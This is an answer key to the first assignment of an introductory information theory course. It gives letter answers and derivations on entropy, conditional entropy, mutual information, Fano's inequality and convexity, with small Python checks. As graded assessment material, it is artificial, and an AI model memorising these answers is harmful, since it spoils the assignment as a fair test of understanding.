Assignment 1 Solutions for An Introduction to Information Theory.
Assignment 1 Solutions
Solution 1: (d) By the chain rule for entropy we have

H(Y, Z | X) = H(Z | X) + H(Y | X, Z) = H(Y | X) + H(Z | X, Y) → (c)

Also, conditioning cannot increase entropy. Hence

H(Z | X, Y) ≤ H(Z | X)

and

H(Y | X, Z) ≤ H(Y | X).

Therefore we have

H(Y, Z | X) ≤ H(Y | X) + H(Z | X) → (a)

and

H(Y, Z | X) ≤ H(Z | X) + H(Y | X). → (b)

Hence, all the statements are true.
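As a sanity check, the chain-rule identity and the conditioning inequalities can be verified numerically on an arbitrary joint distribution (a minimal Python sketch; the random pmf and the helper `H` are illustrative choices, not from the problem):

```python
import itertools
import math
import random

random.seed(0)

# An arbitrary joint pmf p(x, y, z) over binary X, Y, Z (illustrative only)
points = list(itertools.product([0, 1], repeat=3))
weights = [random.random() for _ in points]
total = sum(weights)
p = {pt: w / total for pt, w in zip(points, weights)}

def H(target, given=()):
    """Conditional entropy H(target | given) in bits; arguments are index
    tuples into the coordinates (X, Y, Z) = (0, 1, 2) of the joint pmf p."""
    joint, marg = {}, {}
    for pt, v in p.items():
        g = tuple(pt[i] for i in given)
        t = tuple(pt[i] for i in target)
        joint[(g, t)] = joint.get((g, t), 0.0) + v
        marg[g] = marg.get(g, 0.0) + v
    return -sum(v * math.log2(v / marg[g]) for (g, t), v in joint.items() if v > 0)

X, Y, Z = 0, 1, 2
lhs = H((Y, Z), (X,))
# Chain rule: H(Y,Z|X) = H(Z|X) + H(Y|X,Z) = H(Y|X) + H(Z|X,Y)
assert abs(lhs - (H((Z,), (X,)) + H((Y,), (X, Z)))) < 1e-9
assert abs(lhs - (H((Y,), (X,)) + H((Z,), (X, Y)))) < 1e-9
# Conditioning cannot increase entropy, hence H(Y,Z|X) <= H(Y|X) + H(Z|X)
assert lhs <= H((Y,), (X,)) + H((Z,), (X,)) + 1e-9
```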
Solution 2: (a) Given the probabilities {p1, p2, p3} = {0.25, 0.25, 0.5}, the information content of X (in bits)
is given as

H(X) = −Σ_{i=1}^{3} p_i log2 p_i = −(0.25 log2 0.25 + 0.25 log2 0.25 + 0.5 log2 0.5) = 1.5 bits.
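The arithmetic can be checked in a few lines of Python (a minimal sketch; the helper name `entropy` is an illustrative choice):

```python
import math

def entropy(probs):
    """Shannon entropy in bits of a discrete distribution."""
    return -sum(p * math.log2(p) for p in probs if p > 0)

H_X = entropy([0.25, 0.25, 0.5])
print(H_X)  # 1.5
```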
Solution 3: (b) We will prove this by contradiction. Assume that there exists an x, say x0, and two different values
of y, say y1 and y2, such that p(x0, y1) > 0 and p(x0, y2) > 0. Then p(x0) ≥ p(x0, y1) + p(x0, y2) > 0, and p(y1 | x0)
and p(y2 | x0) are not equal to 0 or 1. Thus

H(Y | X) = −Σ_x p(x) Σ_y p(y | x) log p(y | x)
         ≥ p(x0) (−p(y1 | x0) log p(y1 | x0) − p(y2 | x0) log p(y2 | x0))
         > 0,

since −t log t ≥ 0 for 0 ≤ t ≤ 1, and is strictly positive for t not equal to 0 or 1. Therefore our assumption that there
are two different values of y with p(x0, y_i) > 0, i ∈ {1, 2}, is incorrect; i.e., for every x with p(x) > 0 there is
only one possible value of y with p(x, y) > 0, or in other words, Y is a function of X.
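The argument can be illustrated numerically: a joint pmf in which some x0 has two y-values with positive mass yields H(Y|X) > 0, while a functional relationship yields exactly 0 (a sketch; the two pmfs and the helper `cond_entropy` are arbitrary illustrative choices):

```python
import math

def cond_entropy(p_xy):
    """H(Y|X) in bits from a joint pmf given as {(x, y): prob}."""
    p_x = {}
    for (x, _), v in p_xy.items():
        p_x[x] = p_x.get(x, 0.0) + v
    return -sum(v * math.log2(v / p_x[x]) for (x, y), v in p_xy.items() if v > 0)

# Two y's share positive mass under x = 0, so H(Y|X) > 0
noisy = {(0, 0): 0.3, (0, 1): 0.2, (1, 0): 0.5}
assert cond_entropy(noisy) > 0

# Y is determined by X, so H(Y|X) = 0
functional = {(0, 1): 0.5, (1, 0): 0.5}
assert abs(cond_entropy(functional)) < 1e-12
```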
Solution 4: (b) This can be proved by justifying the following steps:

H(X, g(X)) (a)= H(X) + H(g(X) | X) (b)= H(X),
H(X, g(X)) (c)= H(g(X)) + H(X | g(X)) (d)≥ H(g(X)).

Thus H(g(X)) ≤ H(X). The justification of each step is as follows:
(a) H(X, g(X)) = H(X) + H(g(X) | X) by the chain rule for entropies.
(b) H(g(X) | X) = 0, since for any particular value of X, g(X) is fixed; hence H(g(X) | X) = Σ_x p(x) H(g(X) | X = x) = Σ_x p(x) · 0 = 0.
(c) H(X, g(X)) = H(g(X)) + H(X | g(X)), again by the chain rule.
(d) H(X | g(X)) ≥ 0, with equality if and only if X is a function of g(X), i.e., g(·) is one-to-one.
Hence H(X) ≥ H(g(X)).
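A quick numerical illustration of H(g(X)) ≤ H(X), using an arbitrary many-to-one g (illustrative choice; equality would require g to be one-to-one on the support of X):

```python
import math
from collections import defaultdict

def entropy(probs):
    """Shannon entropy in bits."""
    return -sum(p * math.log2(p) for p in probs if p > 0)

# X uniform on {0, 1, 2, 3}; g(x) = x mod 2 collapses four values to two
p_x = {0: 0.25, 1: 0.25, 2: 0.25, 3: 0.25}
p_gx = defaultdict(float)
for x, px in p_x.items():
    p_gx[x % 2] += px

H_X = entropy(p_x.values())    # 2.0 bits
H_gX = entropy(p_gx.values())  # 1.0 bit
assert H_gX <= H_X
print(H_X, H_gX)  # 2.0 1.0
```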
Solution 5: (c) Since the coin is selected at random, the probability of selecting either coin is P(coin =
fair) = P(coin = biased) = 1/2. Therefore, the random variable (RV) X takes the values 0 and 1 with equal probability,
and H(X) is given as

H(X) = −Σ_{x_i ∈ {0,1}} P(X = x_i) log2 P(X = x_i) = −(1/2 log2 1/2 + 1/2 log2 1/2) = 1 bit.
Solution 6: (b) To find H(Y), we first have to obtain P(Y = y_i) for all i. If the unbiased coin is chosen, the
sample space of the experiment is S1 = {HH, HT, TH, TT}, so that 0, 1 or 2 tails may be recorded. However, if
we select the biased coin, the sample space is S2 = {HH}, so that 0 tails will be recorded. This experiment can
be understood from Figure 1: first we select the coin at random, and then conduct the tossing experiment.

[Figure 1: tree diagram of the experiment. X (the selected coin) takes the values 0 and 1 with probability 1/2 each;
from X = 0 the branches to Y = 0, 1, 2 carry probabilities 1/4, 1/2, 1/4, and from X = 1 the single branch to Y = 0
carries probability 1.]

The probability P(Y = y_i) is given as:
P(Y = 0) = Σ_x P(Y = 0, X = x) = P(X = 0)P(Y = 0 | X = 0) + P(X = 1)P(Y = 0 | X = 1)
         = 1/2 · 1/4 + 1/2 · 1 = 5/8
P(Y = 1) = Σ_x P(Y = 1, X = x) = P(X = 0)P(Y = 1 | X = 0) + P(X = 1)P(Y = 1 | X = 1)
         = 1/2 · 1/2 + 1/2 · 0 = 1/4
P(Y = 2) = Σ_x P(Y = 2, X = x) = P(X = 0)P(Y = 2 | X = 0) + P(X = 1)P(Y = 2 | X = 1)
         = 1/2 · 1/4 + 1/2 · 0 = 1/8
Therefore, H(Y) is given as

H(Y) = −Σ_{y_i ∈ {0,1,2}} P(Y = y_i) log2 P(Y = y_i) = −(5/8 log2 5/8 + 1/4 log2 1/4 + 1/8 log2 1/8)
     ≈ 1.3 bits.
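The marginalization and the value of H(Y) can be reproduced in Python (a minimal sketch; the dictionary names are illustrative):

```python
import math

def entropy(probs):
    """Shannon entropy in bits."""
    return -sum(p * math.log2(p) for p in probs if p > 0)

# From the text: X = 0 is the fair coin, X = 1 the biased (always-heads) coin
p_x = {0: 0.5, 1: 0.5}
p_y_given_x = {0: {0: 0.25, 1: 0.5, 2: 0.25}, 1: {0: 1.0, 1: 0.0, 2: 0.0}}

# Marginalize: P(Y = y) = sum_x P(X = x) P(Y = y | X = x)
p_y = {y: sum(p_x[x] * p_y_given_x[x][y] for x in p_x) for y in (0, 1, 2)}
assert p_y == {0: 0.625, 1: 0.25, 2: 0.125}  # 5/8, 1/4, 1/8

H_Y = entropy(p_y.values())
print(round(H_Y, 4))  # 1.2988, i.e. about 1.3 bits
```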
Solution 7: (b) The mutual information I(X; Y) is given as

I(X; Y) = H(Y) − H(Y | X).

We know that H(Y) ≈ 1.3 bits. The conditional entropy H(Y | X) is given as

H(Y | X) = H(Y | X = 0)P(X = 0) + H(Y | X = 1)P(X = 1).

When X = 1, Y always takes the value 0, so there is no uncertainty in the value of Y, i.e., H(Y | X = 1) = 0.
And when X = 0, Y takes the values 0, 1 and 2 with probabilities 1/4, 1/2 and 1/4 respectively. Therefore we have

H(Y | X = 0) = −(2 · 1/4 log2 1/4 + 1/2 log2 1/2) = 1.5
⟹ H(Y | X) = H(Y | X = 0)P(X = 0) = 1.5 · 1/2 = 0.75
⟹ I(X; Y) = H(Y) − H(Y | X) ≈ 1.3 − 0.75 = 0.55 bits.
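The same computation, carried out numerically (a sketch; the dictionary names are illustrative):

```python
import math

def entropy(probs):
    """Shannon entropy in bits."""
    return -sum(p * math.log2(p) for p in probs if p > 0)

p_x = {0: 0.5, 1: 0.5}
p_y_given_x = {0: {0: 0.25, 1: 0.5, 2: 0.25}, 1: {0: 1.0}}

# P(Y) by marginalizing over the coin choice
p_y = {}
for x, cond in p_y_given_x.items():
    for y, pyx in cond.items():
        p_y[y] = p_y.get(y, 0.0) + p_x[x] * pyx

H_Y = entropy(p_y.values())                        # about 1.2988 bits
H_Y_given_X = sum(p_x[x] * entropy(cond.values())  # 0.5*1.5 + 0.5*0 = 0.75
                  for x, cond in p_y_given_x.items())
I = H_Y - H_Y_given_X
print(round(I, 4))  # 0.5488, i.e. about 0.55 bits
```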
Solution 8: (c) Information theory proves the existence of a code; however, it does not give the best coding scheme.
Solution 9: (a) The inequality in option (b) follows directly from Fano's lemma. Now, since we know that H(p) ≤ 1
and log(L − 1) < log L, we have the inequality in (c):

1 + p log L ≥ H(p) + p log(L − 1) ≥ H(X | Y).

Hence, the only incorrect option is (a).
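The chain of inequalities H(p) + p log(L − 1) ≤ 1 + p log L can be checked over a grid of error probabilities p and alphabet sizes L (a sketch; `h2` is an illustrative binary-entropy helper):

```python
import math

def h2(p):
    """Binary entropy H(p) in bits."""
    return 0.0 if p in (0.0, 1.0) else -p * math.log2(p) - (1 - p) * math.log2(1 - p)

# The Fano bound H(p) + p*log(L-1) never exceeds the looser bound 1 + p*log(L)
for L in range(2, 11):
    for i in range(0, 101):
        p = i / 100
        assert h2(p) + p * math.log2(L - 1) <= 1 + p * math.log2(L) + 1e-12
```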
Solution 10: (b) We establish the convexity/non-convexity of each of the functions as follows:
(a) We know that a function f(x) is concave if f''(x) ≤ 0. Here,

f''(x) = (1 − log x)/x² ≥ 0 on the domain of interest.

Hence, it is not a concave function.
(b) See the lecture notes.
(c) We fix p(x) and consider two different conditional distributions p1(y|x) and p2(y|x). The corresponding joint
distributions are p1(x, y) = p(x)p1(y|x) and p2(x, y) = p(x)p2(y|x), and their respective marginals are (p(x), p1(y)) and
(p(x), p2(y)). Consider a conditional distribution

pλ(y|x) = λp1(y|x) + (1 − λ)p2(y|x)

that is a mixture of p1(y|x) and p2(y|x). The corresponding joint distribution is also a mixture of the
corresponding joint distributions,

pλ(x, y) = λp1(x, y) + (1 − λ)p2(x, y),

and the distribution of Y is also a mixture,

pλ(y) = λp1(y) + (1 − λ)p2(y).

Hence, if we let qλ(x, y) = p(x)pλ(y) be the product of the marginal distributions, we have

qλ(x, y) = λq1(x, y) + (1 − λ)q2(x, y).

Since the mutual information is the relative entropy between the joint distribution and the product of the
marginal distributions, i.e.,

I(X; Y) = D(pλ ‖ qλ),

and the relative entropy D(p ‖ q) is a convex function of the pair (p, q) (see the lecture notes), it follows that the mutual
information is a convex function of p(y|x) for fixed p(x).
(d) See the lecture notes.
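The convexity claimed in (c) can be spot-checked numerically: for a fixed input pmf and two channels, the mutual information of their λ-mixture is at most the mixture of their mutual informations (a sketch; the input pmf, channels, and λ below are arbitrary illustrative values):

```python
import math

def mutual_info(p_x, channel):
    """I(X;Y) in bits for an input pmf p_x and a channel {x: {y: p(y|x)}}."""
    p_y = {}
    for x, px in p_x.items():
        for y, pyx in channel[x].items():
            p_y[y] = p_y.get(y, 0.0) + px * pyx
    return sum(px * pyx * math.log2(pyx / p_y[y])
               for x, px in p_x.items()
               for y, pyx in channel[x].items() if pyx > 0)

# Fixed input pmf, two arbitrary channels, and their λ-mixture
p_x = {0: 0.4, 1: 0.6}
ch1 = {0: {0: 0.9, 1: 0.1}, 1: {0: 0.2, 1: 0.8}}
ch2 = {0: {0: 0.6, 1: 0.4}, 1: {0: 0.5, 1: 0.5}}
lam = 0.3
mix = {x: {y: lam * ch1[x][y] + (1 - lam) * ch2[x][y] for y in (0, 1)} for x in (0, 1)}

# Convexity in p(y|x) for fixed p(x): I(mixture) <= λ·I(ch1) + (1−λ)·I(ch2)
assert mutual_info(p_x, mix) <= lam * mutual_info(p_x, ch1) + (1 - lam) * mutual_info(p_x, ch2) + 1e-12
```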